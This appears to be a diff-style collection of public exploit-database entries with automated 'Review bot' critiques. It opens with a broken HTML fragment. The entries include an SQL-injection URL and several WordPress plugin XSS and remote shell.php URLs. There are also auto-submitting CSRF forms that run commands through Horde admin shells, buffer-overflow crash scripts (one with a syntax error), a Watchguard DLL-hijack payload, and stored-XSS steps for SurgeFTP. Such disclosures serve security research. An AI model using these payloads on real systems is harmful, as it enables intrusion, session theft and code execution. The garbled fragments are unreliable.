/></label></form></center><br><br><br>Powered
By <a
href=http://www.example.com</a></body></html></iframe></a></p></body></html>
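Review bot: the body never says which input is injected; only the files.csv title ("'file name' Parameter") identifies it, and the pasted listing shows the file name emitted unescaped into both the href and the link text of the hosted-files page, so the advisory should state that the uploaded file's name is the injection point and that the listing must HTML-encode it on output (htmlspecialchars or the platform's equivalent). The pasted markup is also cut off and unbalanced at the end (href=http://www.example.com</a></body></html></iframe></a></p></body></html> closes an iframe and a body that were never opened), which reads as copy damage rather than part of the finding and should be trimmed.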


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/62438/info
mukioplayer4wp for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
mukioplayer4wp 1.6 is vulnerable; other versions may also be affected.
http://www.example.com/videos/wp-content/plugins/mukioplayer-for-wordpress/php-scripts/get.php?cid=71866877%27
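Review bot: the only evidence offered is a URL with a single quote appended to cid (%27); the advisory does not say what the response looks like, so a reader cannot tell a database error from an ordinary failed lookup, and it should state the observed behaviour. It also gives no remediation: get.php should treat cid as an integer (cast it, or bind it as a parameter of a prepared statement) rather than interpolating the raw query-string value into SQL, and the entry should name the plugin version, if any, in which that was done.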

platforms/php/webapps/38756.txt (15 lines, executable file)

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/62458/info
The RokNewsPager plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An information-disclosure vulnerability
2. A cross-site scripting vulnerability
3. An arbitrary file-upload vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example2.com/shell.php
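Review bot: unlike the companion RokStories entry (38757), this advisory never states which RokNewsPager version was tested, so the "prone to multiple security vulnerabilities" claim has no version to check against; add the tested version. The four URLs are also not tied to the four numbered issues; labelling each with the issue it demonstrates (the src carrying an HTML tag is the cross-site scripting case, the remote shell.php the file-upload case, and so on) would make the list actionable. Since all four go through thumb.php's src parameter, the remediation is the same for every issue and should be stated once: restrict src to local files or an allow-list of hosts, reject anything that is not image content, and escape or drop the parameter in any error output.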

platforms/php/webapps/38757.txt Executable file (20 lines)

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/62459/info
The RokStories plugin for WordPress is prone to multiple security vulnerabilities, including:
1. An arbitrary file-upload vulnerability
2. A cross-site scripting vulnerability
3. An information-disclosure vulnerability
4. A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
RokStories 1.25 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://
http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example2.com/shell.php
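Review bot: the PoC URLs duplicate the RokNewsPager entry verbatim apart from the plugin directory, while the numbered list here puts file upload first and the sibling entry puts information disclosure first, so the two entries cannot be cross-read reliably. Keep the issue order consistent between them, and add a solution or fixed-version line (missing from both) so that a patched `thumb.php` can be recognised.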

platforms/php/webapps/38765.txt Executable file (90 lines)

@ -0,0 +1,90 @@
Advisory ID: HTB23272
Product: Horde Groupware
Vendor: http://www.horde.org
Vulnerable Version(s): 5.2.10 and probably prior
Tested Version: 5.2.10
Advisory Publication: September 30, 2015 [without technical details]
Vendor Notification: September 30, 2015
Vendor Patch: October 22, 2015
Public Disclosure: November 18, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-7984
Risk Level: High
CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration suite Horde Groupware, used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information, stored in database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and companys infrastructure.
1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984
1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary system commands on the server.
CSRF exploit below sends HTTP POST request to vulnerable script and instructs it to display output of "/bin/ls" command. As a result, you will see contents of "/admin/" directory:
<form action="http://[host]/admin/cmdshell.php" method="post" name="main">
<input type="hidden" name="cmd" value="ls">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary SQL queries with applications database.
The exploit code below executes "SELECT version()" query and displays version of current MySQL server:
<form action="http://[host]/admin/sqlshell.php" method="post" name="main">
<input type="hidden" name="sql" value="SELECT version()">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary php code on the server.
The exploit code below executes the "phpinfo()" function and displays its output:
<form action="http://[host]/admin/phpshell.php" method="post" name="main">
<input type="hidden" name="app" value="horde">
<input type="hidden" name="php" value="phpinfo();">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Horde Groupware 5.2.11
More Information:
http://lists.horde.org/archives/announce/2015/001137.html
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware.
[2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
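Review bot: the Solution section names 5.2.11 and a mailing-list post but does not say what changed, and the Advisory Details line has a typo (`companys infrastructure`). State the mitigation in one line so that operators who cannot upgrade immediately know what to watch for; from the three PoCs alone, the detection signal is cross-origin POST requests to `/admin/cmdshell.php`, `/admin/sqlshell.php` and `/admin/phpshell.php` carrying the `cmd`, `sql` and `php` parameters, which should never originate from outside the application itself.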

platforms/windows/dos/38758.py Executable file (25 lines)

@ -0,0 +1,25 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date    : 18/11/2015
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version    : 4.1
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1.py
# 2.- Open super_scan_4.1.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Scan > Hostname/IP
# 5.- Clic on add button (->)
# 6.- Crashed
buffer = "\x41" * 636
eip = "\x42" * 4
f = open ("super_scan_4.1.txt", "w")
f.write(buffer + eip)
f.close()
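Review bot: the variable `eip` on the second code line implies return-address control, but the header classifies the issue as a local DoS crash PoC and, unlike 38760.py, includes no register or SEH state to support that. Either add the crash state that shows where the four `B` bytes land or rename the variable to `padding`. The step-1 file name `super_scan_4.1.py` also does not match the stored name `38758.py`, and `Clic` in step 5 should be `Click`.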

platforms/windows/dos/38759.py Executable file (25 lines)

@ -0,0 +1,25 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date    : 18/11/2015
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version    : 4.1
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_tools.py
# 2.- Open super_scan_4.1_tools.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Tools > Hostname/IP/URL
# 5.- Clic on button -> Whois
# 6.- Crashed
buffer = "\x41" * 280
eip = "\x42" * 4
f = open ("super_scan_4.1_tools.txt", "w")
f.write(buffer + eip)
f.close()
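Review bot: the same gaps as in 38758.py apply here: `eip` is asserted by the variable name but no crash state is shown, the step-1 file name `super_scan_4.1_tools.py` differs from the stored `38759.py`, and `Clic` should read `Click`. It is also worth stating that the 280-byte length is specific to the Tools field (the Scan field entry uses 636), so readers do not treat the two PoCs as interchangeable.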

platforms/windows/dos/38760.py Executable file (53 lines)

@ -0,0 +1,53 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date    : 18/11/2015
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version    : 4.1
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_windows_enumeration.py
# 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Windows Enumeration > Hostname/IP/URL
# 5.- Clic on button -> Enumerate
# 6.- Crashed
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this:
# 00E3FF98 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
#00E3FF88 41414141 AAAA
#00E3FF8C 41414141 AAAA
#00E3FF90 41414141 AAAA
#00E3FF94 41414141 AAAA
#00E3FF98 42424242 BBBB Pointer to next SEH record
#00E3FF9C 43434343 CCCC SE handler
# And the Registers
#EAX 00000001
#ECX 00000001
#EDX 7C91E514 ntdll.KiFastSystemCallRet
#EBX 00A028E8
#ESP 00E3FF58 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
#EBP 41414141
#ESI 00473774 SuperSca.00473774
#EDI 00000000
#EIP 41414141
buffer = "\x41" * 328
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("super_scan_4.1_windows_enumeration.txt", "w")
f.write(buffer + nseh + seh)
f.close()
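Review bot: the register dump in the notes shows `EIP 41414141` and `EBP 41414141`, meaning the `A` padding already overwrites a saved return address and frame pointer independently of the SEH records at `00E3FF98`/`00E3FF9C`, yet the title and notes describe only an SEH overflow. Document both conditions, since a direct EIP overwrite and an SEH overwrite are different faults and the entry's classification should reflect the one actually observed first. The step-1 file name mismatch and the `Clic` typo match the issues in the two sibling PoCs.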

platforms/windows/dos/38761.py Executable file (22 lines)

@ -0,0 +1,22 @@
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC
# Discovery by : Vivek Mahajan - c3p70r
# Discovery Date : 19/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
# Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
# Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://
buffer = "A"*510
file = open("spade.txt, 'w')
file.write(buffer)
file.close()
# Follow on twitter @vik.create
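Review bot: the `open` call is a syntax error as written: `open("spade.txt, 'w')` starts a double-quoted string that is never closed, so the script does not run at all. It should read `file = open("spade.txt", "w")`, and since `file` shadows a Python 2 builtin, `f` or `out` is the better name. The crash-point line also says "Do Remove the http://" without saying from what; presumably the pasted value must carry no scheme prefix, and the header should say so explicitly.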

platforms/windows/local/38752.c Executable file (26 lines)

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/62261/info
Watchguard Server Center is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain SYSTEM privileges. Successful exploits will result in the complete compromise of affected computers.
Watchguard Server Center 11.7.4 and 11.7.3 are vulnerable; other versions may also be affected.
#include <windows.h>
#define DLL_EXPORT __declspec(dllexport)
#ifdef __cplusplus
extern "C"
{
#endif
void DLL_EXPORT wgpr_library_get()
{
WinExec("calc",0);
}
#ifdef __cplusplus
}
#endif
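Review bot: the four description lines at the top sit uncommented in a `.c` file, so it will not compile until they are wrapped in a `/* ... */` block. More importantly for anyone validating the report, the entry never names the library file or the directory from which Watchguard Server Center loads the `wgpr_library_get` export, so neither the finding nor a check of the affected installation for an unexpected library can be verified from the text; add that detail from the bid/62261 write-up cited on the first line.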


@ -0,0 +1,33 @@
********************************************************************************************
# Exploit Netwin SurgeFTP Sever Stored Cross Site Scripting Vulnerabilities
# Date: 11/18/2015
# Exploit Author: Un_N0n
# Vendor: NetWin
# Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp
# Version: 23d6
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]
Surgeftp web-interface suffers with multiple Stored XSS vulnerabilities.
They are:
Stored XSS in 'Domain Name' field.
[How to?]
1. Open SurgeFTP web interface, Click on global option from the menu.
2. Add a new domain, in 'Domain Name' field, add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to main page, hover mouse over 'broken image' in 'domains' section.
Stored XSS in 'Mirrors'.
[How to?]
1. Open surgeftp web interface, Click on 'Mirrors' option from the menu.
2. Click on Add Mirror, in 'Local path' & 'Remote Host' field add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to 'Mirror' page again, Hover mouse over the 'broken image' in 'local path' & 'remote host' field.
Previously, Somebody else reported Stored XSS vulnerabilities in SurgeFTP.
Vendor tried to fix the previously reported XSS vulnerabilities by blacklisting only the <script>alert('blah')</script> payload
which is well not a good practice since i have triggered the same vulnerability by just entering different XSS payload,
therefore White-listing is the correct solution.
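Review bot: the closing recommendation says whitelisting is the correct fix, but the symptom described in both [How to?] sections is the stored value being rendered unescaped on the main page and the Mirror page, so the advice should also name output encoding of the 'Domain Name', 'Local path' and 'Remote Host' values at render time; input filtering alone is what the vendor's blacklist already attempted. The title also has a typo (`Sever` for `Server`), and the version string `23d6` carries no date or build context to pin it down.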